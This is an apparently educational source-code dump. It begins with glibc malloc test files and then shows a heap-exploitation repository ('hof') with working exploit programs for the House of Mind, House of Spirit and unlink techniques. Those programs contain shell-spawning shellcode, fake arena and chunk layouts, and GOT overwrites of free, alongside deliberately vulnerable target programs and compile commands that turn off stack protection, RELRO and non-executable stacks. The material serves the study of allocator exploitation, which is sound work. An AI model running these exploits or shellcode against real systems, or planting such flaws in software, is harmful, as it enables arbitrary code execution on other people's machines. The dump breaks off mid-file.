p; 77 | ok = 1; 78 | 79 | for (i = 0; i < 20; i++) 80 | { 81 | if (c[i] != 0) 82 | ok = 0; 83 | } 84 | 85 | if (ok == 0) 86 | merror ("first 20 bytes were not cleared"); 87 | 88 | free (p); 89 | 90 | p = realloc (NULL, 100); 91 | if (p == NULL) 92 | merror ("realloc (NULL, 100) failed."); 93 | 94 | memset (p, 0xff, 100); 95 | 96 | /* Check decreasing size preserves contents (C89). */ 97 | p = realloc (p, 16); 98 | if (p == NULL) 99 | merror ("realloc (p, 16) failed."); 100 | 101 | c = p; 102 | ok = 1; 103 | 104 | for (i = 0; i < 16; i++) 105 | { 106 | if (c[i] != 0xff) 107 | ok = 0; 108 | } 109 | 110 | if (ok == 0) 111 | merror ("first 16 bytes were not correct"); 112 | 113 | /* Check failed realloc leaves original untouched (C89). */ 114 | c = realloc (p, -1); 115 | if (c != NULL) 116 | merror ("realloc (p, -1) succeeded."); 117 | 118 | c = p; 119 | ok = 1; 120 | 121 | for (i = 0; i < 16; i++) 122 | { 123 | if (c[i] != 0xff) 124 | ok = 0; 125 | } 126 | 127 | if (ok == 0) 128 | merror ("first 16 bytes were not correct after failed realloc"); 129 | 130 | /* realloc (p, 0) frees p (C89) and returns NULL (glibc). */ 131 | p = realloc (p, 0); 132 | if (p != NULL) 133 | merror ("realloc (p, 0) returned non-NULL."); 134 | 135 | /* realloc (NULL, 0) acts like malloc (0) (glibc). */ 136 | p = realloc (NULL, 0); 137 | if (p == NULL) 138 | merror ("realloc (NULL, 0) returned NULL."); 139 | 140 | free (p); 141 | 142 | return errors != 0; 143 | } 144 | 145 | #define TEST_FUNCTION do_test () 146 | #include "../test-skeleton.c" 147 | -------------------------------------------------------------------------------- /glibc/malloc/tst-trim1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define N 10000 7 | 8 | static void *arr[N]; 9 | 10 | static int 11 | do_test (void) 12 | { 13 | for (int i = 0; i < N; ++i) 14 | { 15 | size_t size = random () % 16384; 16 | 17 | if ((arr[i] = malloc (size)) == NULL) 18 | { 19 | nomem: 20 | puts ("not enough memory"); 21 | return 0; 22 | } 23 | 24 | memset (arr[i], size, size); 25 | } 26 | 27 | void *p = malloc (256); 28 | if (p == NULL) 29 | goto nomem; 30 | memset (p, 1, 256); 31 | 32 | puts ("=================================================================="); 33 | 34 | for (int i = 0; i < N; ++i) 35 | if (i % 13 != 0) 36 | free (arr[i]); 37 | 38 | puts ("=================================================================="); 39 | 40 | malloc_trim (0); 41 | 42 | puts ("=================================================================="); 43 | 44 | p = malloc (30000); 45 | if (p == NULL) 46 | goto nomem; 47 | 48 | memset (p, 2, 30000); 49 | 50 | malloc_trim (0); 51 | 52 | return 0; 53 | } 54 | 55 | #define TEST_FUNCTION do_test () 56 | #include "../test-skeleton.c" 57 | -------------------------------------------------------------------------------- /glibc/malloc/tst-valloc.c: -------------------------------------------------------------------------------- 1 | /* Test for valloc. 2 | Copyright (C) 2013-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | 25 | static int errors = 0; 26 | 27 | static void 28 | merror (const char *msg) 29 | { 30 | ++errors; 31 | printf ("Error: %s\n", msg); 32 | } 33 | 34 | static int 35 | do_test (void) 36 | { 37 | void *p; 38 | unsigned long pagesize = getpagesize (); 39 | unsigned long ptrval; 40 | int save; 41 | 42 | errno = 0; 43 | 44 | /* An attempt to allocate a huge value should return NULL and set 45 | errno to ENOMEM. */ 46 | p = valloc (-1); 47 | 48 | save = errno; 49 | 50 | if (p != NULL) 51 | merror ("valloc (-1) succeeded."); 52 | 53 | if (p == NULL && save != ENOMEM) 54 | merror ("valloc (-1) errno is not set correctly"); 55 | 56 | free (p); 57 | 58 | errno = 0; 59 | 60 | /* Test to expose integer overflow in malloc internals from BZ #15856. */ 61 | p = valloc (-pagesize); 62 | 63 | save = errno; 64 | 65 | if (p != NULL) 66 | merror ("valloc (-pagesize) succeeded."); 67 | 68 | if (p == NULL && save != ENOMEM) 69 | merror ("valloc (-pagesize) errno is not set correctly"); 70 | 71 | free (p); 72 | 73 | /* A zero-sized allocation should succeed with glibc, returning a 74 | non-NULL value. */ 75 | p = valloc (0); 76 | 77 | if (p == NULL) 78 | merror ("valloc (0) failed."); 79 | 80 | free (p); 81 | 82 | /* Check the alignment of the returned pointer is correct. */ 83 | p = valloc (32); 84 | 85 | if (p == NULL) 86 | merror ("valloc (32) failed."); 87 | 88 | ptrval = (unsigned long) p; 89 | 90 | if ((ptrval & (pagesize - 1)) != 0) 91 | merror ("returned pointer is not page aligned."); 92 | 93 | free (p); 94 | 95 | return errors != 0; 96 | } 97 | 98 | #define TEST_FUNCTION do_test () 99 | #include "../test-skeleton.c" 100 | -------------------------------------------------------------------------------- /glibc/stdlib/cxa_thread_atexit_impl.c: -------------------------------------------------------------------------------- 1 | /* Register destructors for C++ TLS variables declared with thread_local. 2 | Copyright (C) 2013-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | 22 | typedef void (*dtor_func) (void *); 23 | 24 | struct dtor_list 25 | { 26 | dtor_func func; 27 | void *obj; 28 | struct link_map *map; 29 | struct dtor_list *next; 30 | }; 31 | 32 | static __thread struct dtor_list *tls_dtor_list; 33 | static __thread void *dso_symbol_cache; 34 | static __thread struct link_map *lm_cache; 35 | 36 | /* Register a destructor for TLS variables declared with the 'thread_local' 37 | keyword. This function is only called from code generated by the C++ 38 | compiler. FUNC is the destructor function and OBJ is the object to be 39 | passed to the destructor. DSO_SYMBOL is the __dso_handle symbol that each 40 | DSO has at a unique address in its map, added from crtbegin.o during the 41 | linking phase. */ 42 | int 43 | __cxa_thread_atexit_impl (dtor_func func, void *obj, void *dso_symbol) 44 | { 45 | /* Prepend. */ 46 | struct dtor_list *new = calloc (1, sizeof (struct dtor_list)); 47 | new->func = func; 48 | new->obj = obj; 49 | new->next = tls_dtor_list; 50 | tls_dtor_list = new; 51 | 52 | /* See if we already encountered the DSO. */ 53 | __rtld_lock_lock_recursive (GL(dl_load_lock)); 54 | 55 | if (__glibc_unlikely (dso_symbol_cache != dso_symbol)) 56 | { 57 | ElfW(Addr) caller = (ElfW(Addr)) dso_symbol; 58 | 59 | struct link_map *l = _dl_find_dso_for_object (caller); 60 | 61 | /* If the address is not recognized the call comes from the main 62 | program (we hope). */ 63 | lm_cache = l ? l : GL(dl_ns)[LM_ID_BASE]._ns_loaded; 64 | } 65 | /* A destructor could result in a thread_local construction and the former 66 | could have cleared the flag. */ 67 | if (lm_cache->l_type == lt_loaded && lm_cache->l_tls_dtor_count == 0) 68 | lm_cache->l_flags_1 |= DF_1_NODELETE; 69 | 70 | new->map = lm_cache; 71 | new->map->l_tls_dtor_count++; 72 | 73 | __rtld_lock_unlock_recursive (GL(dl_load_lock)); 74 | 75 | return 0; 76 | } 77 | 78 | /* Call the destructors. This is called either when a thread returns from the 79 | initial function or when the process exits via the exit function. */ 80 | void 81 | __call_tls_dtors (void) 82 | { 83 | while (tls_dtor_list) 84 | { 85 | struct dtor_list *cur = tls_dtor_list; 86 | tls_dtor_list = tls_dtor_list->next; 87 | 88 | cur->func (cur->obj); 89 | 90 | __rtld_lock_lock_recursive (GL(dl_load_lock)); 91 | 92 | /* Allow DSO unload if count drops to zero. */ 93 | cur->map->l_tls_dtor_count--; 94 | if (cur->map->l_tls_dtor_count == 0 && cur->map->l_type == lt_loaded) 95 | cur->map->l_flags_1 &= ~DF_1_NODELETE; 96 | 97 | __rtld_lock_unlock_recursive (GL(dl_load_lock)); 98 | 99 | free (cur); 100 | } 101 | } 102 | libc_hidden_def (__call_tls_dtors) 103 | -------------------------------------------------------------------------------- /hof/hom/exp.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define BIN1 0xb7fd8430 4 | 5 | char scode[] = 6 | /* Size - 72 bytes. */ 7 | "\x31\xc9\x83\xe9\xf4\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5e" 8 | "\xc9\x6a\x42\x83\xeb\xfc\xe2\xf4\x34\xc2\x32\xdb\x0c\xaf\x02\x6f" 9 | "\x3d\x40\x8d\x2a\x71\xba\x02\x42\x36\xe6\x08\x2b\x30\x40\x89\x10" 10 | "\xb6\xc5\x6a\x42\x5e\xe6\x1f\x31\x2c\xe6\x08\x2b\x30\xe6\x03\x26" 11 | "\x5e\x9e\x39\xcb\xbf\x04\xea\x42"; 12 | 13 | char ret_str[4] = "\x00\x00\x00\x00"; 14 | 15 | void convert_endianess(int arg) 16 | { 17 | int i=0; 18 | ret_str[3] = (arg & 0xFF000000) >> 24; 19 | ret_str[2] = (arg & 0x00FF0000) >> 16; 20 | ret_str[1] = (arg & 0x0000FF00) >> 8; 21 | ret_str[0] = (arg & 0x000000FF) >> 0; 22 | } 23 | int main() { 24 | int i=0,j=0; 25 | 26 | fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* fd */ 27 | fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* bk */ 28 | fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* fd_nextsize */ 29 | fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* bk_nextsize */ 30 | /* Fake Arena. */ 31 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* mutex */ 32 | fwrite("\x01\x00\x00\x00", 4, 1, stdout); /* flag */ 33 | for(i=0;i<10;i++) 34 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* fastbinsY */ 35 | fwrite("\xb0\x0e\x10\x08", 4, 1, stdout); /* top */ 36 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* last_remainder */ 37 | for(i=0;i<127;i++) { 38 | convert_endianess(BIN1+(i*8)); 39 | if(i == 119) { 40 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* preserve prev_size */ 41 | fwrite("\x09\x04\x00\x00", 4, 1, stdout); /* preserve size */ 42 | } else if(i==0) { 43 | fwrite("\xe8\x98\x04\x08", 4, 1, stdout); /* bins[i][0] = (GOT(free) - 12) */ 44 | fwrite(ret_str, 4, 1, stdout); /* bins[i][1] */ 45 | } 46 | else { 47 | fwrite(ret_str, 4, 1, stdout); /* bins[i][0] */ 48 | fwrite(ret_str, 4, 1, stdout); /* bins[i][1] */ 49 | } 50 | } 51 | for(i=0;i<4;i++) { 52 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* binmap[i] */ 53 | } 54 | fwrite("\x00\x84\xfd\xb7", 4, 1, stdout); /* next */ 55 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* next_free */ 56 | fwrite("\x00\x60\x0c\x00", 4, 1, stdout); /* system_mem */ 57 | fwrite("\x00\x60\x0c\x00", 4, 1, stdout); /* max_system_mem */ 58 | for(i=0;i<234;i++) { 59 | fwrite("\x41\x41\x41\x41", 4, 1, stdout); /* PAD */ 60 | } 61 | for(i=0;i<722;i++) { 62 | if(i==721) { 63 | /* Chunk 724 contains the shellcode. */ 64 | fwrite("\xeb\x18\x00\x00", 4, 1, stdout); /* prev_size - Jmp 24 bytes */ 65 | fwrite("\x0d\x04\x00\x00", 4, 1, stdout); /* size */ 66 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* fd */ 67 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* bk */ 68 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* fd_nextsize */ 69 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* bk_nextsize */ 70 | fwrite("\x90\x90\x90\x90\x90\x90\x90\x90" \ 71 | "\x90\x90\x90\x90\x90\x90\x90\x90", 16, 1, stdout); /* NOPS */ 72 | fwrite(scode, sizeof(scode)-1, 1, stdout); /* SHELLCODE */ 73 | for(j=0;j<230;j++) 74 | fwrite("\x42\x42\x42\x42", 4, 1, stdout); /* PAD */ 75 | continue; 76 | } else { 77 | fwrite("\x00\x00\x00\x00", 4, 1, stdout); /* prev_size */ 78 | fwrite("\x09\x04\x00\x00", 4, 1, stdout); /* size */ 79 | } 80 | if(i==720) { 81 | for(j=0;j<90;j++) 82 | fwrite("\x42\x42\x42\x42", 4, 1, stdout); /* PAD */ 83 | fwrite("\x18\xa0\x04\x08", 4, 1, stdout); /* Arena Pointer */ 84 | for(j=0;j<165;j++) 85 | fwrite("\x42\x42\x42\x42", 4, 1, stdout); /* PAD */ 86 | } else { 87 | for(j=0;j<256;j++) 88 | fwrite("\x42\x42\x42\x42", 4, 1, stdout); /* PAD */ 89 | } 90 | } 91 | return 0; 92 | 93 | } 94 | -------------------------------------------------------------------------------- /hof/hom/malloc_snip.c: -------------------------------------------------------------------------------- 1 | ... 2 | #define HEAP_MIN_SIZE (32 * 1024) 3 | #ifndef HEAP_MAX_SIZE 4 | # ifdef DEFAULT_MMAP_THRESHOLD_MAX 5 | # define HEAP_MAX_SIZE (2 * DEFAULT_MMAP_THRESHOLD_MAX) 6 | # else 7 | # define HEAP_MAX_SIZE (1024 * 1024) /* must be a power of two */ 8 | # endif 9 | #endif 10 | ... 11 | struct malloc_state 12 | { 13 | /* Serialize access. */ 14 | mutex_t mutex; 15 | 16 | /* Flags (formerly in max_fast). */ 17 | int flags; 18 | 19 | /* Fastbins */ 20 | mfastbinptr fastbinsY[NFASTBINS]; 21 | 22 | /* Base of the topmost chunk -- not otherwise kept in a bin */ 23 | mchunkptr top; 24 | 25 | /* The remainder from the most recent split of a small request */ 26 | mchunkptr last_remainder; 27 | 28 | /* Normal bins packed as described above */ 29 | mchunkptr bins[NBINS * 2 - 2]; 30 | 31 | /* Bitmap of bins */ 32 | unsigned int binmap[BINMAPSIZE]; 33 | 34 | /* Linked list */ 35 | struct malloc_state *next; 36 | 37 | /* Linked list for free arenas. */ 38 | struct malloc_state *next_free; 39 | 40 | /* Memory allocated from the system in this arena. */ 41 | INTERNAL_SIZE_T system_mem; 42 | INTERNAL_SIZE_T max_system_mem; 43 | }; 44 | ... 45 | #define heap_for_ptr(ptr) \ 46 | ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1))) 47 | #define arena_for_chunk(ptr) \ 48 | (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena) 49 | ... 50 | void 51 | __libc_free (void *mem) 52 | { 53 | ... 54 | p = mem2chunk (mem); 55 | ... 56 | ar_ptr = arena_for_chunk (p); 57 | _int_free (ar_ptr, p, 0); 58 | } 59 | ... 60 | /* 61 | ------------------------------ free ------------------------------ 62 | */ 63 | 64 | static void 65 | _int_free (mstate av, mchunkptr p, int have_lock) 66 | { 67 | ... 68 | else if (!chunk_is_mmapped(p)) { 69 | ... 70 | nextchunk = chunk_at_offset(p, size); 71 | ... 72 | nextsize = chunksize(nextchunk); 73 | ... 74 | /* consolidate backward */ 75 | if (!prev_inuse(p)) { 76 | prevsize = p->prev_size; 77 | size += prevsize; 78 | p = chunk_at_offset(p, -((long) prevsize)); 79 | unlink(p, bck, fwd); 80 | } 81 | 82 | if (nextchunk != av->top) { 83 | /* get and clear inuse bit */ 84 | nextinuse = inuse_bit_at_offset(nextchunk, nextsize); 85 | 86 | /* consolidate forward */ 87 | if (!nextinuse) { 88 | unlink(nextchunk, bck, fwd); 89 | size += nextsize; 90 | } else 91 | clear_inuse_bit_at_offset(nextchunk, 0); 92 | 93 | /* 94 | Place the chunk in unsorted chunk list. Chunks are 95 | not placed into regular bins until after they have 96 | been given one chance to be used in malloc. 97 | */ 98 | 99 | bck = unsorted_chunks(av); 100 | fwd = bck->fd; 101 | p->fd = fwd; 102 | p->bk = bck; 103 | if (!in_smallbin_range(size)) 104 | { 105 | p->fd_nextsize = NULL; 106 | p->bk_nextsize = NULL; 107 | } 108 | bck->fd = p; 109 | fwd->bk = p; 110 | 111 | set_head(p, size | PREV_INUSE); 112 | set_foot(p, size); 113 | 114 | check_free_chunk(av, p); 115 | } 116 | 117 | /* 118 | If the chunk borders the current high end of memory, 119 | consolidate into top 120 | */ 121 | 122 | else { 123 | size += nextsize; 124 | set_head(p, size | PREV_INUSE); 125 | av->top = p; 126 | check_chunk(av, p); 127 | } 128 | ... 129 | } 130 | -------------------------------------------------------------------------------- /hof/hom/vuln.c: -------------------------------------------------------------------------------- 1 | /* 2 | House of Mind vulnerable program 3 | */ 4 | #include 5 | #include 6 | 7 | int main (void) { 8 | char *ptr = malloc(1024); /* First allocated chunk */ 9 | char *ptr2, *ptr3; /* Second chunk & Last but one chunk */ 10 | int heap = (int)ptr & 0xFFF00000; 11 | _Bool found = 0; 12 | int i = 2; 13 | 14 | printf("ptr found at %p\n", ptr); /* Print address of first chunk */ 15 | 16 | for (i = 2; i < 1024; i++) { 17 | /* Prereq 1: Series of malloc calls until a chunk's address - when aligned to HEAP_MAX_SIZE results in 0x08100000 */ 18 | /* 0x08100000 is the place where fake heap_info structure is found. */ 19 | if (!found && (((int)(ptr2 = malloc(1024)) & 0xFFF00000) == \ 20 | (heap + 0x100000))) { 21 | printf("good heap allignment found on malloc() %i (%p)\n", i, ptr2); 22 | found = 1; 23 | break; 24 | } 25 | 26 | } 27 | ptr3 = malloc(1024); /* Last but one chunk */ 28 | malloc(1024); /* Request another chunk. Hence next chunk to ptr3 != top chunk */ 29 | /* User Input. */ 30 | fread (ptr, 1024 * 1024, 1, stdin); 31 | 32 | free(ptr); /* Free first chunk */ 33 | free(ptr2); /* Prereq 2: Freeing a chunk whose size and its arena pointer is controlled by the attacker. */ 34 | free(ptr3); /* Shell code execution. */ 35 | return(0); /* Bye */ 36 | } 37 | -------------------------------------------------------------------------------- /hof/hos/cmd: -------------------------------------------------------------------------------- 1 | #Compile commands 2 | gcc -g -fno-stack-protector -z norelro -z execstack -o vuln vuln.c -Wl,--rpath=/home/sploitfun/glibc/glibc-inst2.20/lib -Wl,--dynamic-linker=/home/sploitfun/glibc/glibc-inst2.20/lib/ld-linux.so.2 3 | gcc -g -o exp exp.c 4 | 5 | #Run commands 6 | ./exp 7 | -------------------------------------------------------------------------------- /hof/hos/exp.c: -------------------------------------------------------------------------------- 1 | /* Program to exploit executable 'vuln' using hos technique. 2 | */ 3 | #include 4 | #include 5 | 6 | 7 | #define VULNERABLE "./vuln" 8 | 9 | /* Shellcode to spwan a shell. Size: 48 bytes - Includes Return Address overwrite */ 10 | char scode[] = 11 | "\xeb\x0e\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xb8\xfd\xff\xbf\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90"; 12 | 13 | int main( void ) 14 | { 15 | int i; 16 | char * p; 17 | char argv1[54]; 18 | char * argv[] = { VULNERABLE, argv1, NULL }; 19 | 20 | strcpy(argv1,scode); 21 | 22 | /* Overwrite ptr1 in vuln with stack address - 0xbffffdf0. Overwrite local_age in vuln with chunk size - 0x30 */ 23 | strcpy(argv1+48,"\xf0\xfd\xff\xbf\x30"); 24 | 25 | argv[53] = '\0'; 26 | 27 | /* Execution of the vulnerable program */ 28 | execve( argv[0], argv, NULL ); 29 | return( -1 ); 30 | } 31 | -------------------------------------------------------------------------------- /hof/hos/vuln.c: -------------------------------------------------------------------------------- 1 | /* vuln.c 2 | House of Spirit vulnerable program 3 | */ 4 | #include 5 | #include 6 | #include 7 | 8 | void fvuln(char *str1, int age) 9 | { 10 | char *ptr1, name[44]; 11 | int local_age; 12 | char *ptr2; 13 | 14 | local_age = age; 15 | 16 | ptr1 = (char *) malloc(256); 17 | printf("\nPTR1 = [ %p ]", ptr1); 18 | strcpy(name, str1); 19 | printf("\nPTR1 = [ %p ]\n", ptr1); 20 | 21 | free(ptr1); 22 | 23 | ptr2 = (char *) malloc(40); 24 | 25 | snprintf(ptr2, 40-1, "%s is %d years old", name, local_age); 26 | printf("\n%s\n", ptr2); 27 | } 28 | 29 | int main(int argc, char *argv[]) 30 | { 31 | int i=0; 32 | int stud_class[10]; /* Required since nextchunk size should lie in between 8 and arena's system_mem. */ 33 | for(i=0;i<10;i++) 34 | stud_class[i] = 10; 35 | if (argc == 2) 36 | fvuln(argv[1], 25); 37 | 38 | return 0; 39 | } 40 | 41 | -------------------------------------------------------------------------------- /hof/ptmalloc.ppt/comments/cons.c: -------------------------------------------------------------------------------- 1 | /* 2 | Clarification - Consolidation of chunks can lead to its size being more than 128KB 3 | and hence could stay in brk'd memory region. 4 | */ 5 | #include 6 | #include 7 | 8 | int main() { 9 | char *a, *b, *c, *d, *e, *f; 10 | a = (char*) malloc((128*1024)-16); //Max possible allocation throught brk 11 | b = (char*) malloc((130*1024)-8); //Use the remaining top chunk 12 | c = (char*) malloc((128*1024)-16); //Extend the top chunk 13 | d = (char*) malloc((130*1024)-8); //Use the remaining top chunk 14 | e = (char*) malloc(100); //This chunk restricts consolidation into top chunk 15 | free(a); //Add chunk a into unsorted bin 16 | free(b); //Add consolidated chunk (a+b) into unsorted bin 17 | free(c); //Add consolidated chunk (a+b+c) into unsorted bin 18 | free(d); //Add consolidated chunk (a+b+c+d) into unsorted bin 19 | f = (char*) malloc((1024*1024)-8); //Put the above consolidated chunk into bin 126 (last largest bin) 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /hof/ptmalloc.ppt/mthread/mthread.c: -------------------------------------------------------------------------------- 1 | /* Per thread arena example. */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void* threadFunc(void* arg) { 9 | printf("Before malloc in thread 1\n"); 10 | getchar(); 11 | char* addr = (char*) malloc(1000); 12 | printf("After malloc and before free in thread 1\n"); 13 | getchar(); 14 | free(addr); 15 | printf("After free in thread 1\n"); 16 | getchar(); 17 | } 18 | 19 | int main() { 20 | pthread_t t1; 21 | void* s; 22 | int ret; 23 | char* addr; 24 | 25 | printf("Welcome to per thread arena example::%d\n",getpid()); 26 | printf("Before malloc in main thread\n"); 27 | getchar(); 28 | addr = (char*) malloc(1000); 29 | printf("After malloc and before free in main thread\n"); 30 | getchar(); 31 | free(addr); 32 | printf("After free in main thread\n"); 33 | getchar(); 34 | ret = pthread_create(&t1, NULL, threadFunc, NULL); 35 | if(ret) 36 | { 37 | printf("Thread creation error\n"); 38 | return -1; 39 | } 40 | ret = pthread_join(t1, &s); 41 | if(ret) 42 | { 43 | printf("Thread join error\n"); 44 | return -1; 45 | } 46 | return 0; 47 | } 48 | -------------------------------------------------------------------------------- /hof/ptmalloc.ppt/syscalls/mmap.c: -------------------------------------------------------------------------------- 1 | /* Anonymous mapping example using mmap syscall */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | void static inline errExit(const char* msg) 11 | { 12 | printf("%s failed. Exiting the process\n", msg); 13 | exit(-1); 14 | } 15 | 16 | int main() 17 | { 18 | int ret = -1; 19 | printf("Welcome to anonymous mapping example::PID:%d\n", getpid()); 20 | printf("Before mmap\n"); 21 | getchar(); 22 | char* addr = NULL; 23 | addr = mmap(NULL, (size_t)132*1024, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); 24 | if (addr == MAP_FAILED) 25 | errExit("mmap"); 26 | printf("After mmap\n"); 27 | getchar(); 28 | 29 | /* Unmap mapped region. */ 30 | ret = munmap(addr, (size_t)132*1024); 31 | if(ret == -1) 32 | errExit("munmap"); 33 | printf("After munmap\n"); 34 | getchar(); 35 | return 0; 36 | } 37 | -------------------------------------------------------------------------------- /hof/ptmalloc.ppt/syscalls/sbrk.c: -------------------------------------------------------------------------------- 1 | /* sbrk and brk example */ 2 | #include 3 | #include 4 | #include 5 | 6 | int main() 7 | { 8 | void *curr_brk, *tmp_brk = NULL; 9 | 10 | printf("Welcome to sbrk example:%d\n", getpid()); 11 | 12 | /* sbrk(0) gives current program break location */ 13 | tmp_brk = curr_brk = sbrk(0); 14 | printf("Program Break Location1:%p\n", curr_brk); 15 | getchar(); 16 | 17 | /* brk(addr) increments/decrements program break location */ 18 | brk(curr_brk+4096); 19 | 20 | curr_brk = sbrk(0); 21 | printf("Program Break Location2:%p\n", curr_brk); 22 | getchar(); 23 | 24 | brk(tmp_brk); 25 | 26 | curr_brk = sbrk(0); 27 | printf("Program Break Location3:%p\n", curr_brk); 28 | getchar(); 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /hof/unlink/exp.c: -------------------------------------------------------------------------------- 1 | /* Program to exploit 'vuln' using unlink technique. 2 | */ 3 | #include 4 | #include 5 | 6 | #define FUNCTION_POINTER ( 0x0804978c ) //Address of GOT entry for free function obtained using "objdump -R vuln". 7 | #define CODE_ADDRESS ( 0x0804a008 + 0x10 ) //Address of variable 'first' in vuln executable. 8 | 9 | #define VULNERABLE "./vuln" 10 | #define DUMMY 0xdefaced 11 | #define PREV_INUSE 0x1 12 | 13 | char shellcode[] = 14 | /* Jump instruction to jump past 10 bytes. ppssssffff - Of which ffff would be overwritten by unlink function 15 | (by statement BK->fd = FD). Hence if no jump exists shell code would get corrupted by unlink function. 16 | Therefore store the actual shellcode 12 bytes past the beginning of buffer 'first'*/ 17 | "\xeb\x0assppppffff" 18 | "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; 19 | 20 | int main( void ) 21 | { 22 | char * p; 23 | char argv1[ 680 + 1 ]; 24 | char * argv[] = { VULNERABLE, argv1, NULL }; 25 | 26 | p = argv1; 27 | /* the fd field of the first chunk */ 28 | *( (void **)p ) = (void *)( DUMMY ); 29 | p += 4; 30 | /* the bk field of the first chunk */ 31 | *( (void **)p ) = (void *)( DUMMY ); 32 | p += 4; 33 | /* the fd_nextsize field of the first chunk */ 34 | *( (void **)p ) = (void *)( DUMMY ); 35 | p += 4; 36 | /* the bk_nextsize field of the first chunk */ 37 | *( (void **)p ) = (void *)( DUMMY ); 38 | p += 4; 39 | /* Copy the shellcode */ 40 | memcpy( p, shellcode, strlen(shellcode) ); 41 | p += strlen( shellcode ); 42 | /* Padding- 16 bytes for prev_size,size,fd and bk of second chunk. 16 bytes for fd,bk,fd_nextsize,bk_nextsize 43 | of first chunk */ 44 | memset( p, 'B', (680 - 4*4) - (4*4 + strlen(shellcode)) ); 45 | p += ( 680 - 4*4 ) - ( 4*4 + strlen(shellcode) ); 46 | /* the prev_size field of the second chunk. Just make sure its an even number ie) its prev_inuse bit is unset */ 47 | *( (size_t *)p ) = (size_t)( DUMMY & ~PREV_INUSE ); 48 | p += 4; 49 | /* the size field of the second chunk. By setting size to -4, we trick glibc malloc to unlink second chunk.*/ 50 | *( (size_t *)p ) = (size_t)( -4 ); 51 | p += 4; 52 | /* the fd field of the second chunk. It should point to free - 12. -12 is required since unlink function 53 | would do + 12 (FD->bk). This helps to overwrite the GOT entry of free with the address we have overwritten in 54 | second chunk's bk field (see below) */ 55 | *( (void **)p ) = (void *)( FUNCTION_POINTER - 12 ); 56 | p += 4; 57 | /* the bk field of the second chunk. It should point to shell code address.*/ 58 | *( (void **)p ) = (void *)( CODE_ADDRESS ); 59 | p += 4; 60 | /* the terminating NUL character */ 61 | *p = '\0'; 62 | 63 | /* the execution of the vulnerable program */ 64 | execve( argv[0], argv, NULL ); 65 | return( -1 ); 66 | } 67 | -------------------------------------------------------------------------------- /hof/unlink/malloc_free_snip.c: -------------------------------------------------------------------------------- 1 | ... 2 | /* 3 | ------------------------------ free ------------------------------ 4 | */ 5 | 6 | static void 7 | _int_free (mstate av, mchunkptr p, int have_lock) 8 | { 9 | ... 10 | else if (!chunk_is_mmapped(p)) { 11 | ... 12 | nextchunk = chunk_at_offset(p, size); 13 | ... 14 | nextsize = chunksize(nextchunk); 15 | ... 16 | /* consolidate backward */ 17 | if (!prev_inuse(p)) { 18 | prevsize = p->prev_size; 19 | size += prevsize; 20 | p = chunk_at_offset(p, -((long) prevsize)); 21 | unlink(p, bck, fwd); 22 | } 23 | 24 | if (nextchunk != av->top) { 25 | /* get and clear inuse bit */ 26 | nextinuse = inuse_bit_at_offset(nextchunk, nextsize); 27 | 28 | /* consolidate forward */ 29 | if (!nextinuse) { 30 | unlink(nextchunk, bck, fwd); 31 | size += nextsize; 32 | } else 33 | clear_inuse_bit_at_offset(nextchunk, 0); 34 | 35 | /* 36 | Place the chunk in unsorted chunk list. Chunks are 37 | not placed into regular bins until after they have 38 | been given one chance to be used in malloc. 39 | */ 40 | 41 | bck = unsorted_chunks(av); 42 | fwd = bck->fd; 43 | if (__glibc_unlikely (fwd->bk != bck)) 44 | { 45 | errstr = "free(): corrupted 